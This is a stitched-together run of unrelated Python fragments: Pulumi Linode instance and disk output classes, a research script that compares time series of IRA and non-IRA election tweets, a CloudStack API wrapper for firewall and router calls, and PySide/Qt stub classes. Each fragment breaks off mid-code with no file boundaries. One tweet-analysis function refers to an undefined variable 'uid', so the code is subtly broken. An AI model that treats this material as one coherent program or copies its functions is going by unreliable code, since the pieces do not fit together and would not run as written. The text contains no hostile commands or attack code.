def modules_dep(self) -> Optional[bool]:
"""
Creates a modules dependency file for the Kernel you run.
"""
return pulumi.get(self, "modules_dep")
@property
@pulumi.getter
def network(self) -> Optional[bool]:
"""
Controls the behavior of the Linode Config's Network Helper setting, used to automatically configure additional IP addresses assigned to this instance.
"""
return pulumi.get(self, "network")
@property
@pulumi.getter(name="updatedbDisabled")
def updatedb_disabled(self) -> Optional[bool]:
"""
Disables updatedb cron job to avoid disk thrashing.
"""
return pulumi.get(self, "updatedb_disabled")
@pulumi.output_type
class InstanceConfigInterface(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "ipamAddress":
suggest = "ipam_address"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in InstanceConfigInterface. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
InstanceConfigInterface.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
InstanceConfigInterface.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
ipam_address: Optional[str] = None,
label: Optional[str] = None,
purpose: Optional[str] = None):
"""
:param str ipam_address: This Network Interface’s private IP address in Classless Inter-Domain Routing (CIDR) notation.
:param str label: The name of this interface. If the interface is a VLAN, a label is required.
:param str purpose: The type of interface. (`public`, `vlan`)
"""
if ipam_address is not None:
pulumi.set(__self__, "ipam_address", ipam_address)
if label is not None:
pulumi.set(__self__, "label", label)
if purpose is not None:
pulumi.set(__self__, "purpose", purpose)
@property
@pulumi.getter(name="ipamAddress")
def ipam_address(self) -> Optional[str]:
"""
This Network Interface’s private IP address in Classless Inter-Domain Routing (CIDR) notation.
"""
return pulumi.get(self, "ipam_address")
@property
@pulumi.getter
def label(self) -> Optional[str]:
"""
The name of this interface. If the interface is a VLAN, a label is required.
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def purpose(self) -> Optional[str]:
"""
The type of interface. (`public`, `vlan`)
"""
return pulumi.get(self, "purpose")
@pulumi.output_type
class InstanceDisk(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "authorizedKeys":
suggest = "authorized_keys"
elif key == "authorizedUsers":
suggest = "authorized_users"
elif key == "readOnly":
suggest = "read_only"
elif key == "rootPass":
suggest = "root_pass"
elif key == "stackscriptData":
suggest = "stackscript_data"
elif key == "stackscriptId":
suggest = "stackscript_id"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in InstanceDisk. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
InstanceDisk.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
InstanceDisk.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
label: str,
size: int,
authorized_keys: Optional[Sequence[str]] = None,
authorized_users: Optional[Sequence[str]] = None,
filesystem: Optional[str] = None,
id: Optional[int] = None,
image: Optional[str] = None,
read_only: Optional[bool] = None,
root_pass: Optional[str] = None,
stackscript_data: Optional[Mapping[str, Any]] = None,
stackscript_id: Optional[int] = None):
"""
:param str label: The name of this interface. If the interface is a VLAN, a label is required.
:param int size: The size of the Disk in MB.
:param Sequence[str] authorized_keys: A list of SSH public keys to deploy for the root user on the newly created Linode. Only accepted if `image` is provided. *This value can not be imported.* *Changing `authorized_keys` forces the creation of a new Linode Instance.*
:param Sequence[str] authorized_users: A list of Linode usernames. If the usernames have associated SSH keys, the keys will be appended to the `root` user's `~/.ssh/authorized_keys` file automatically. *This value can not be imported.* *Changing `authorized_users` forces the creation of a new Linode Instance.*
:param str filesystem: The Disk filesystem can be one of: `"raw"`, `"swap"`, `"ext3"`, `"ext4"`, or `"initrd"` which has a max size of 32mb and can be used in the config `initrd` (not currently supported in this provider).
:param int id: The ID of the disk in the Linode API.
:param str image: An Image ID to deploy the Disk from. Official Linode Images start with linode/, while your Images start with private/. See /images for more information on the Images available for you to use. Examples are `linode/debian9`, `linode/fedora28`, `linode/ubuntu16.04lts`, `linode/arch`, and `private/12345`. See all images [here](https://api.linode.com/v4/linode/kernels). *Changing `image` forces the creation of a new Linode Instance.*
:param str root_pass: The initial password for the `root` user account. *This value can not be imported.* *Changing `root_pass` forces the creation of a new Linode Instance.* *If omitted, a random password will be generated but will not be stored in state.*
:param Mapping[str, Any] stackscript_data: An object containing responses to any User Defined Fields present in the StackScript being deployed to this Linode. Only accepted if 'stackscript_id' is given. The required values depend on the StackScript being deployed. *This value can not be imported.* *Changing `stackscript_data` forces the creation of a new Linode Instance.*
:param int stackscript_id: The StackScript to deploy to the newly created Linode. If provided, 'image' must also be provided, and must be an Image that is compatible with this StackScript. *This value can not be imported.* *Changing `stackscript_id` forces the creation of a new Linode Instance.*
"""
pulumi.set(__self__, "label", label)
pulumi.set(__self__, "size", size)
if authorized_keys is not None:
pulumi.set(__self__, "authorized_keys", authorized_keys)
if authorized_users is not None:
pulumi.set(__self__, "authorized_users", authorized_users)
if filesystem is not None:
pulumi.set(__self__, "filesystem", filesystem)
if id is not None:
pulumi.set(__self__, "id", id)
if image is not None:
pulumi.set(__self__, "image", image)
if read_only is not None:
pulumi.set(__self__, "read_only", read_only)
if root_pass is not None:
pulumi.set(__self__, "root_pass", root_pass)
if stackscript_data is not None:
pulumi.set(__self__, "stackscript_data", stackscript_data)
if stackscript_id is not None:
pulumi.set(__self__, "stackscript_id", stackscript_id)
@property
@pulumi.getter
def label(self) -> str:
"""
The name of this interface. If the interface is a VLAN, a label is required.
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def size(self) -> int:
"""
The size of the Disk in MB.
"""
return pulumi.get(self, "size")
@property
@pulumi.getter(name="authorizedKeys")
def authorized_keys(self) -> Optional[Sequence[str]]:
"""
A list of SSH public keys to deploy for the root user on the newly created Linode. Only accepted if `image` is provided. *This value can not be imported.* *Changing `authorized_keys` forces the creation of a new Linode Instance.*
"""
return pulumi.get(self, "authorized_keys")
@property
@pulumi.getter(name="authorizedUsers")
def authorized_users(self) -> Optional[Sequence[str]]:
"""
A list of Linode usernames. If the usernames have associated SSH keys, the keys will be appended to the `root` user's `~/.ssh/authorized_keys` file automatically. *This value can not be imported.* *Changing `authorized_users` forces the creation of a new Linode Instance.*
"""
return pulumi.get(self, "authorized_users")
@property
@pulumi.getter
def filesystem(self) -> Optional[str]:
"""
The Disk filesystem can be one of: `"raw"`, `"swap"`, `"ext3"`, `"ext4"`, or `"initrd"` which has a max size of 32mb and can be used in the config `initrd` (not currently supported in this provider).
"""
return pulumi.get(self, "filesystem")
@property
@pulumi.getter
def id(self) -> Optional[int]:
"""
The ID | |
<reponame>kayzhou/election
import pendulum
from my_weapon import *
"""
针对 disk/all-url-tweets.json 进行分析
默认15分钟的粒度
"""
from pyloess import stl
# LOESS smoothing
def get_day(dt):
return pendulum.parse(dt).format("YYYY-MM-DD 00:00:00")
def get_hour(dt):
return pendulum.parse(dt).format("YYYY-MM-DD HH:00:00")
def get_15min(dt):
_dt = pendulum.parse(dt)
t0 = pendulum.parse(_dt.format("YYYY-MM-DD HH:00:00"))
t1 = t0.add(minutes=15)
t2 = t0.add(minutes=30)
t3 = t0.add(minutes=45)
if t0 <= _dt < t1:
return t0
elif _dt < t2:
return t1
elif _dt < t3:
return t2
else:
return t3
def get_15min_file():
with open("disk/user_time_15Mins.txt", "w") as f:
for line in tqdm(open('disk/user_time.txt')):
w = line.strip().split()
u = w[1]
_dt = w[2] + " " + w[3]
_dt = get_15min(_dt).to_datetime_string()
f.write(f"{w[0]} {w[1]} {_dt}\n")
def cal_ts(dts, resolution="15Min"):
"""
真的牛逼!
"""
ts = pd.to_datetime(dts)
ts = ts.value_counts()
ts = ts.resample(resolution).sum()
return ts
def cal_ts_day(dts):
start = get_day(dts[0])
end = get_day(dts[-1])
rng = pd.date_range(start, end, freq='D')
ts = pd.Series(0, rng)
for dt in dts:
now = get_day(dt)
ts[now] += 1
return ts
def cal_ts_48hours(dts):
start = get_hour(dts[0])
rng = pd.date_range(start, periods=48, freq="H")
ts = pd.Series(0, rng)
for dt in dts:
now = get_hour(dt)
if now in ts:
ts[now] += 1
return ts
def plot_day(i, url, sorted_dts, sorted_dts2=None, save=False):
"""
包含了两条线!
"""
plt.figure(figsize=(10, 6))
ts = cal_ts_day(sorted_dts)
ts.plot()
if sorted_dts2:
ts2 = cal_ts_day(sorted_dts2)
ts2.plot()
# configure
plt.ylabel('N of tweets with this fake news', fontsize=15)
plt.xticks(fontsize=11); plt.yticks(fontsize=11)
# plt.xlabel('$Date$', fontsize=15)
# plt.title(url)
if save:
plt.savefig('fig/{}-{}-overall-spread.pdf'.format(i, url), dpi=300)
else:
plt.show()
plt.close()
def plot_48hours(i, url, sorted_dts, sorted_dts2=None, save=False):
"""
包含了两条线!
"""
# print(url)
# print("实际传播开始和结束时间:", sorted_dts[0], sorted_dts[-1])
plt.figure(figsize=(10, 6))
ts = cal_ts_48hours(sorted_dts)
ts.plot()
if sorted_dts2:
ts2 = cal_ts_48hours(sorted_dts2)
ts2.plot()
# configure
plt.ylabel('N of tweets with this fake news', fontsize=15)
plt.xticks(fontsize=11); plt.yticks(fontsize=11)
# plt.xlabel('$Date$', fontsize=15)
# plt.title(url)
if save:
plt.savefig('fig/{}-{}-first-48-hours.pdf'.format(i, url), dpi=300)
else:
plt.show()
plt.close()
# from stldecompose import decompose, forecast
import matplotlib.ticker as ticker
IRA_data = pd.read_csv("data/ira-tweets-ele.csv")
def format_date(x, pos=None):
#保证下标不越界,很重要,越界会导致最终plot坐标轴label无显示
# thisind = np.clip(int(x+0.5), 0, N-1)
print(type(x), x)
return x.strftime('%Y-%m-%d')
import pendulum
from datetime import datetime
def load_should_remove():
should_remove_15Min = []
for line in open("data/should_be_removed_in_timeseries.txt"):
_dt = line.strip()
_start = datetime.strptime(_dt, '%Y-%m-%d %H:%M:%S')
for _dt in pd.date_range(start=_start, periods=4 * 24, freq="15Min"):
should_remove_15Min.append(pd.to_datetime(_dt))
return should_remove_15Min
# 载入一些需要的数据
should_remove_15Min = load_should_remove()
user_support = json.load(open("disk/user_hillary_trump.json"))
users_opinion = {}
opinion = Counter()
for uid, v in tqdm(user_support.items()):
if v[0] > v[1]:
users_opinion[uid] = "C"
opinion["C"] += 1
elif v[0] < v[1]:
users_opinion[uid] = "T"
opinion["T"] += 1
else:
users_opinion[uid] = "U"
opinion["U"] += 1
from fake_identify import Are_you_IRA
Putin = Are_you_IRA()
def get_tsss(cN, layer="one"):
"""
获取IRA和non-IRA的活动时间序列
"""
def get_ts(IRA_nodes):
dts = []
for i, row in tqdm(IRA_data.iterrows()):
u = Putin.uncover(row.userid)
if u in IRA_nodes:
_dt = row.tweet_time
# Move to EST
_dt = pendulum.parse(_dt).add(hours=-4).to_datetime_string()
dts.append(_dt)
ts = pd.to_datetime(dts)
ts = ts.value_counts()
ts = ts.resample("15Min").sum()
ts = ts[(ts.index >= "2016-06-01") & (ts.index < "2016-11-09")]
ts = ts[~ts.index.isin(should_remove_15Min)]
return ts
def get_non(non_IRA_nodes):
non_dts = []
for line in tqdm(open('disk/user_time.txt')):
w = line.strip().split()
uid = w[1]
_dt = w[2] + " " + w[3]
if uid in non_IRA_nodes:
non_dts.append(_dt)
non_ts = pd.to_datetime(non_dts)
non_ts = non_ts.value_counts()
non_ts = non_ts.resample("15Min").sum()
non_ts = non_ts[(non_ts.index >= "2016-06-01") & (non_ts.index < "2016-11-09")]
non_ts = non_ts[~non_ts.index.isin(should_remove_15Min)]
return non_ts
G = nx.read_gpickle(f"data/graph/C{cN}-{layer}-layer.gpickle")
IRA_nodes = set([n for n in G.nodes if Putin.check(n)])
non_IRA_nodes = set([n for n in G.nodes if not Putin.check(n)])
print("IRA and non-IRA:", len(IRA_nodes), len(non_IRA_nodes))
influ = {line.strip() for line in open(f"data/influencers/C{cN}-uid.txt")}
non_IRA_influ_nodes = set([n for n in G.nodes
if not Putin.check(n) and n in influ])
non_IRA_non_influ_nodes = set([n for n in G.nodes
if not Putin.check(n) and n not in influ])
print("non-IRA influ and non-influ:", len(non_IRA_influ_nodes), len(non_IRA_non_influ_nodes))
T_IRA_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion
and users_opinion[n] == "T"])
C_IRA_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion
and users_opinion[n] == "C"])
print("Trump & Clinton:", len(T_IRA_nodes), len(C_IRA_nodes))
T_flu_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion
and users_opinion[n] == "T" and n in influ])
C_flu_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion
and users_opinion[n] == "C" and n in influ])
print("Trump & Clinton (flu):", len(T_flu_nodes), len(C_flu_nodes))
T_nonflu_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion
and users_opinion[n] == "T" and n not in influ])
C_nonflu_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion
and users_opinion[n] == "C" and n not in influ])
print("Trump & Clinton (non flu):", len(T_nonflu_nodes), len(C_nonflu_nodes))
ts = get_ts(IRA_nodes)
non_ts = get_non(non_IRA_nodes)
influ_ts = get_non(non_IRA_influ_nodes)
non_influ_ts = get_non(non_IRA_non_influ_nodes)
T_ts = get_non(T_IRA_nodes)
C_ts = get_non(C_IRA_nodes)
T_flu_ts = get_non(T_flu_nodes)
C_flu_ts = get_non(C_flu_nodes)
T_nonflu_ts = get_non(T_nonflu_nodes)
C_nonflu_ts = get_non(C_nonflu_nodes)
tsts = pd.DataFrame({
"ts": ts, "non_ts": non_ts, "T_ts": T_ts, "C_ts": C_ts,
"influ_ts": influ_ts, "non_influ_ts": non_influ_ts,
"T_flu_ts": T_flu_ts, "C_flu_ts": C_flu_ts,
"T_nonflu_ts": T_nonflu_ts, "C_nonflu_ts": C_nonflu_ts,
})
tsts.to_pickle(f"data/tsts/C{cN}-{layer}-layer.pl")
def get_tsss_user(cN, layer="one"):
def get_15min(dt):
_dt = pendulum.parse(dt)
t0 = pendulum.parse(_dt.format("YYYY-MM-DD HH:00:00"))
t1 = t0.add(minutes=15)
t2 = t0.add(minutes=30)
t3 = t0.add(minutes=45)
if t0 <= _dt < t1:
return t0
elif _dt < t2:
return t1
elif _dt < t3:
return t2
else:
return t3
def get_ts(IRA_nodes):
user_set = set()
dts = []
for i, row in tqdm(IRA_data.iterrows()):
u = Putin.uncover(row.userid)
if u in IRA_nodes:
_dt = row.tweet_time
_dt = pendulum.parse(_dt).add(hours=-4).to_datetime_string()
_dt = get_15min(_dt).to_datetime_string()
if u + "~" + _dt not in user_set:
user_set.add(u + "~" + _dt)
dts.append(_dt)
ts = pd.to_datetime(dts)
ts = ts.value_counts()
ts = ts.resample("15Min").sum()
ts = ts[(ts.index >= "2016-06-01") & (ts.index < "2016-11-09")]
ts = ts[~ts.index.isin(should_remove_15Min)]
return ts
def get_non(non_IRA_nodes):
user_set = set()
non_dts = []
for line in tqdm(open('disk/user_time_15Mins.txt')):
w = line.strip().split()
u = w[1]
_dt = w[2] + " " + w[3]
if uid in non_IRA_nodes:
if u + "~" + _dt not in user_set:
user_set.add(u + "~" + _dt)
non_dts.append(_dt)
non_ts = pd.to_datetime(non_dts)
non_ts = non_ts.value_counts()
non_ts = non_ts.resample("15Min").sum()
non_ts = non_ts[(non_ts.index >= "2016-06-01") & (non_ts.index < "2016-11-09")]
non_ts = non_ts[~non_ts.index.isin(should_remove_15Min)]
return non_ts
G = nx.read_gpickle(f"data/graph/C{cN}-{layer}-layer.gpickle")
IRA_nodes = set([n for n in G.nodes if Putin.check(n)])
non_IRA_nodes = set([n for n in G.nodes if not Putin.check(n)])
T_IRA_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion and users_opinion[n] == "T"])
C_IRA_nodes = set([n for n in G.nodes if not Putin.check(n) and n in users_opinion and users_opinion[n] == "C"])
ts = get_ts(IRA_nodes)
non_ts = get_non(non_IRA_nodes)
T_ts = get_non(T_IRA_nodes)
C_ts = get_non(C_IRA_nodes)
tsts = pd.DataFrame({"ts": ts, "non_ts": non_ts, "T_ts": T_ts, "C_ts": C_ts})
tsts.to_pickle(f"data/tsts/C{cN}-{layer}-layer-user.pl")
def calculate_resid(cN, layer="two"):
"""
消灭季节性特征
"""
# remove seasonality and trend
stl_params = dict(
np = 96, # period of season
ns = 95, # seasonal smoothing
nt = None, # trend smooting int((1.5*np)/(1-(1.5/ns)))
nl = None, # low-pass filter leat odd integer >= np
isdeg=1,
itdeg=1,
ildeg=1,
robust=True,
ni = 1,
no = 5)
tsts = pd.read_pickle(f"data/tsts/C{cN}-{layer}-layer.pl")
resid = pd.DataFrame(index=tsts.index)
print("Loaded!")
for col in ["ts", "non_ts", "T_ts", "C_ts", "influ_ts", "non_influ_ts",
"T_flu_ts", "C_flu_ts", "T_nonflu_ts", "C_nonflu_ts"]:
print(col)
tsts[col] = tsts[col].fillna(0)
resid[col] = stl(tsts[col].values, **stl_params).residuals
resid.to_pickle(f"data/tsts/resid_C{cN}-{layer}-layer.pl")
print("saved!")
def analyze_ts_of_communities(cN, layer="one", user=False):
if user:
tsts = pd.read_pickle(f"data/tsts/C{cN}-{layer}-layer-user.pl")
else:
tsts = pd.read_pickle(f"data/tsts/C{cN}-{layer}-layer.pl")
# print(tsts)
sns.set(style="white", font_scale=1.2)
fig, ax1 = plt.subplots(figsize=(20, 6))
color = 'tab:red'
ax1.set_ylabel('IRA', color=color) # we already handled the x-label with ax1
ax1.plot("ts", data=tsts, color=color)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:blue'
ax2.set_ylabel('non-IRA', color=color) # we already handled the x-label with ax1
ax2.plot("non_ts", data=tsts, color=color, lw=0.8)
ax2.tick_params(axis='y', labelcolor=color)
# ax2.xaxis.set_major_formatter(ticker.FuncFormatter(format_date))
# fig.autofmt_xdate()
plt.savefig(f"fig/c{cN}-{layer}-layer-ts.pdf", dpi=300)
# plt.show()
plt.close()
if user:
tsts_resid = pd.read_pickle(f"data/tsts/resid_C{cN}-{layer}-layer-user.pl")
else:
tsts_resid = pd.read_pickle(f"data/tsts/resid_C{cN}-{layer}-layer.pl")
# print(tsts_resid)
sns.set(style="white", font_scale=1.2)
fig, ax1 = plt.subplots(figsize=(20, 6))
color = 'tab:red'
ax1.set_ylabel('IRA (residuals)', color=color) # we already handled the x-label with ax1
# ax1.set_ylim((-600, 600))
ax1.plot("ts", data=tsts_resid, color=color, lw=1)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:blue'
ax2.set_ylabel("non-IRA (residuals)", color=color) # we already handled the x-label with ax1
# ax2.set_ylim((-20000, 20000))
ax2.plot("non_ts", data=tsts_resid, color=color, lw=1)
ax2.tick_params(axis='y', labelcolor=color)
plt.savefig(f"fig/c{cN}-{layer}-layer-resid.pdf", dpi=300)
# plt.show()
plt.close()
# sns.set(style="white")
# 相关性分析
# f = plt.figure(figsize=(7, 6))
# plt.matshow(tsts.corr(), fignum=f.number, cmap='Purples')
# plt.xticks(range(tsts.shape[1]), tsts.columns, fontsize=11, rotation=45)
# plt.yticks(range(tsts.shape[1]), tsts.columns, | |
false, list only resources belonging to the command's
caller; if set to true - list resources that the caller is authorized to see.
Default value is false
page -
pagesize -
projectid - list firewall rules by project
page - Pagination
'''
return self.request('listPortForwardingRules', args)
def createPortForwardingRule(self, args={}):
'''
Creates a port forwarding rule
args - A dictionary. The following are options for keys:
ipaddressid - the IP address id of the port forwarding rule
privateport - the starting port of port forwarding rule's private port
range
protocol - the protocol for the port fowarding rule. Valid values are TCP or
UDP.
publicport - the starting port of port forwarding rule's public port range
virtualmachineid - the ID of the virtual machine for the port forwarding
rule
cidrlist - the cidr list to forward traffic from
openfirewall - if true, firewall rule for source/end pubic port is
automatically created; if false - firewall rule has to be created explicitely.
Has value true by default
'''
if 'ipaddressid' not in args:
raise RuntimeError("Missing required argument 'ipaddressid'")
if 'privateport' not in args:
raise RuntimeError("Missing required argument 'privateport'")
if 'protocol' not in args:
raise RuntimeError("Missing required argument 'protocol'")
if 'publicport' not in args:
raise RuntimeError("Missing required argument 'publicport'")
if 'virtualmachineid' not in args:
raise RuntimeError("Missing required argument 'virtualmachineid'")
return self.request('createPortForwardingRule', args)
def deletePortForwardingRule(self, args={}):
'''
Deletes a port forwarding rule
args - A dictionary. The following are options for keys:
id - the ID of the port forwarding rule
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('deletePortForwardingRule', args)
def createFirewallRule(self, args={}):
'''
Creates a firewall rule for a given ip address
args - A dictionary. The following are options for keys:
protocol - the protocol for the firewall rule. Valid values are
TCP/UDP/ICMP.
cidrlist - the cidr list to forward traffic from
endport - the ending port of firewall rule
icmpcode - error code for this icmp message
icmptype - type of the icmp message being sent
ipaddressid - the IP address id of the port forwarding rule
startport - the starting port of firewall rule
type - type of firewallrule: system/user
'''
if 'protocol' not in args:
raise RuntimeError("Missing required argument 'protocol'")
return self.request('createFirewallRule', args)
def deleteFirewallRule(self, args={}):
'''
Deletes a firewall rule
args - A dictionary. The following are options for keys:
id - the ID of the firewall rule
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('deleteFirewallRule', args)
def listFirewallRules(self, args={}):
'''
Lists all firewall rules for an IP address.
args - A dictionary. The following are options for keys:
account - List resources by account. Must be used with the domainId
parameter.
domainid - list only resources belonging to the domain specified
id - Lists rule with the specified ID.
ipaddressid - the id of IP address of the firwall services
isrecursive - defaults to false, but if true, lists all resources from the
parent specified by the domainId till leaves.
keyword - List by keyword
listall - If set to false, list only resources belonging to the command's
caller; if set to true - list resources that the caller is authorized to see.
Default value is false
page -
pagesize -
projectid - list firewall rules by project
page - Pagination
'''
return self.request('listFirewallRules', args)
def addSrxFirewall(self, args={}):
'''
Adds a SRX firewall device
args - A dictionary. The following are options for keys:
networkdevicetype - supports only JuniperSRXFirewall
password - <PASSWORD> reach SRX firewall device
physicalnetworkid - the Physical Network ID
url - URL of the SRX appliance.
username - Credentials to reach SRX firewall device
'''
if 'networkdevicetype' not in args:
raise RuntimeError("Missing required argument 'networkdevicetype'")
if 'password' not in args:
raise RuntimeError("Missing required argument 'password'")
if 'physicalnetworkid' not in args:
raise RuntimeError("Missing required argument 'physicalnetworkid'")
if 'url' not in args:
raise RuntimeError("Missing required argument 'url'")
if 'username' not in args:
raise RuntimeError("Missing required argument 'username'")
return self.request('addSrxFirewall', args)
def deleteSrxFirewall(self, args={}):
'''
delete a SRX firewall device
args - A dictionary. The following are options for keys:
fwdeviceid - srx firewall device ID
'''
if 'fwdeviceid' not in args:
raise RuntimeError("Missing required argument 'fwdeviceid'")
return self.request('deleteSrxFirewall', args)
def configureSrxFirewall(self, args={}):
'''
Configures a SRX firewall device
args - A dictionary. The following are options for keys:
fwdeviceid - SRX firewall device ID
fwdevicecapacity - capacity of the firewall device, Capacity will be
interpreted as number of networks device can handle
'''
if 'fwdeviceid' not in args:
raise RuntimeError("Missing required argument 'fwdeviceid'")
return self.request('configureSrxFirewall', args)
def listSrxFirewalls(self, args={}):
'''
lists SRX firewall devices in a physical network
args - A dictionary. The following are options for keys:
fwdeviceid - SRX firewall device ID
keyword - List by keyword
page -
pagesize -
physicalnetworkid - the Physical Network ID
page - Pagination
'''
return self.request('listSrxFirewalls', args)
def startRouter(self, args={}):
'''
Starts a router.
args - A dictionary. The following are options for keys:
id - the ID of the router
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('startRouter', args)
def rebootRouter(self, args={}):
'''
Starts a router.
args - A dictionary. The following are options for keys:
id - the ID of the router
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('rebootRouter', args)
def stopRouter(self, args={}):
'''
Stops a router.
args - A dictionary. The following are options for keys:
id - the ID of the router
forced - Force stop the VM. The caller knows the VM is stopped.
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('stopRouter', args)
def destroyRouter(self, args={}):
'''
Destroys a router.
args - A dictionary. The following are options for keys:
id - the ID of the router
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('destroyRouter', args)
def changeServiceForRouter(self, args={}):
'''
Upgrades domain router to a new service offering
args - A dictionary. The following are options for keys:
id - The ID of the router
serviceofferingid - the service offering ID to apply to the domain router
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
if 'serviceofferingid' not in args:
raise RuntimeError("Missing required argument 'serviceofferingid'")
return self.request('changeServiceForRouter', args)
def listRouters(self, args={}):
'''
List routers.
args - A dictionary. The following are options for keys:
account - List resources by account. Must be used with the domainId
parameter.
domainid - list only resources belonging to the domain specified
hostid - the host ID of the router
id - the ID of the disk router
isrecursive - defaults to false, but if true, lists all resources from the
parent specified by the domainId till leaves.
keyword - List by keyword
listall - If set to false, list only resources belonging to the command's
caller; if set to true - list resources that the caller is authorized to see.
Default value is false
name - the name of the router
networkid - list by network id
page -
pagesize -
podid - the Pod ID of the router
projectid - list firewall rules by project
state - the state of the router
zoneid - the Zone ID of the router
page - Pagination
'''
return self.request('listRouters', args)
def createVirtualRouterElement(self, args={}):
'''
Create a virtual router element.
args - A dictionary. The following are options for keys:
nspid - the network service provider ID of the virtual router element
'''
if 'nspid' not in args:
raise RuntimeError("Missing required argument 'nspid'")
return self.request('createVirtualRouterElement', args)
def configureVirtualRouterElement(self, args={}):
'''
Configures a virtual router element.
args - A dictionary. The following are options for keys:
id - the ID of the virtual router provider
enabled - Enabled/Disabled the service provider
'''
if 'id' not in args:
| |
pass
def saveState(*args, **kwargs):
pass
def selectFile(*args, **kwargs):
pass
def selectMimeTypeFilter(*args, **kwargs):
pass
def selectNameFilter(*args, **kwargs):
pass
def selectUrl(*args, **kwargs):
pass
def selectedFiles(*args, **kwargs):
pass
def selectedNameFilter(*args, **kwargs):
pass
def selectedUrls(*args, **kwargs):
pass
def setAcceptMode(*args, **kwargs):
pass
def setConfirmOverwrite(*args, **kwargs):
pass
def setDefaultSuffix(*args, **kwargs):
pass
def setDirectory(*args, **kwargs):
pass
def setDirectoryUrl(*args, **kwargs):
pass
def setFileMode(*args, **kwargs):
pass
def setFilter(*args, **kwargs):
pass
def setHistory(*args, **kwargs):
pass
def setIconProvider(*args, **kwargs):
pass
def setItemDelegate(*args, **kwargs):
pass
def setLabelText(*args, **kwargs):
pass
def setMimeTypeFilters(*args, **kwargs):
pass
def setNameFilter(*args, **kwargs):
pass
def setNameFilterDetailsVisible(*args, **kwargs):
pass
def setNameFilters(*args, **kwargs):
pass
def setOption(*args, **kwargs):
pass
def setOptions(*args, **kwargs):
pass
def setProxyModel(*args, **kwargs):
pass
def setReadOnly(*args, **kwargs):
pass
def setResolveSymlinks(*args, **kwargs):
pass
def setSidebarUrls(*args, **kwargs):
pass
def setSupportedSchemes(*args, **kwargs):
pass
def setViewMode(*args, **kwargs):
pass
def setVisible(*args, **kwargs):
pass
def sidebarUrls(*args, **kwargs):
pass
def supportedSchemes(*args, **kwargs):
pass
def testOption(*args, **kwargs):
pass
def viewMode(*args, **kwargs):
pass
def getExistingDirectory(*args, **kwargs):
pass
def getExistingDirectoryUrl(*args, **kwargs):
pass
def getOpenFileName(*args, **kwargs):
pass
def getOpenFileNames(*args, **kwargs):
pass
def getOpenFileUrl(*args, **kwargs):
pass
def getOpenFileUrls(*args, **kwargs):
pass
def getSaveFileName(*args, **kwargs):
pass
def getSaveFileUrl(*args, **kwargs):
pass
Accept = None
AcceptMode = None
AcceptOpen = None
AcceptSave = None
AnyFile = None
Detail = None
DialogLabel = None
Directory = None
DirectoryOnly = None
DontConfirmOverwrite = None
DontResolveSymlinks = None
DontUseCustomDirectoryIcons = None
DontUseNativeDialog = None
DontUseSheet = None
ExistingFile = None
ExistingFiles = None
FileMode = None
FileName = None
FileType = None
HideNameFilterDetails = None
List = None
LookIn = None
Option = None
Options = None
ReadOnly = None
Reject = None
ShowDirsOnly = None
ViewMode = None
__new__ = None
currentChanged = None
currentUrlChanged = None
directoryEntered = None
directoryUrlEntered = None
fileSelected = None
filesSelected = None
filterSelected = None
staticMetaObject = None
urlSelected = None
urlsSelected = None
class QGraphicsEllipseItem(QAbstractGraphicsShapeItem):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def boundingRect(*args, **kwargs):
pass
def contains(*args, **kwargs):
pass
def extension(*args, **kwargs):
pass
def isObscuredBy(*args, **kwargs):
pass
def opaqueArea(*args, **kwargs):
pass
def paint(*args, **kwargs):
pass
def rect(*args, **kwargs):
pass
def setRect(*args, **kwargs):
pass
def setSpanAngle(*args, **kwargs):
pass
def setStartAngle(*args, **kwargs):
pass
def shape(*args, **kwargs):
pass
def spanAngle(*args, **kwargs):
pass
def startAngle(*args, **kwargs):
pass
def type(*args, **kwargs):
pass
__new__ = None
class QSlider(QAbstractSlider):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def event(*args, **kwargs):
pass
def initStyleOption(*args, **kwargs):
pass
def minimumSizeHint(*args, **kwargs):
pass
def mouseMoveEvent(*args, **kwargs):
pass
def mousePressEvent(*args, **kwargs):
pass
def mouseReleaseEvent(*args, **kwargs):
pass
def paintEvent(*args, **kwargs):
pass
def setTickInterval(*args, **kwargs):
pass
def setTickPosition(*args, **kwargs):
pass
def sizeHint(*args, **kwargs):
pass
def tickInterval(*args, **kwargs):
pass
def tickPosition(*args, **kwargs):
pass
NoTicks = None
TickPosition = None
TicksAbove = None
TicksBelow = None
TicksBothSides = None
TicksLeft = None
TicksRight = None
__new__ = None
staticMetaObject = None
class QGraphicsWidget(QGraphicsObject, QGraphicsLayoutItem):
def __init__(*args, **kwargs):
"""
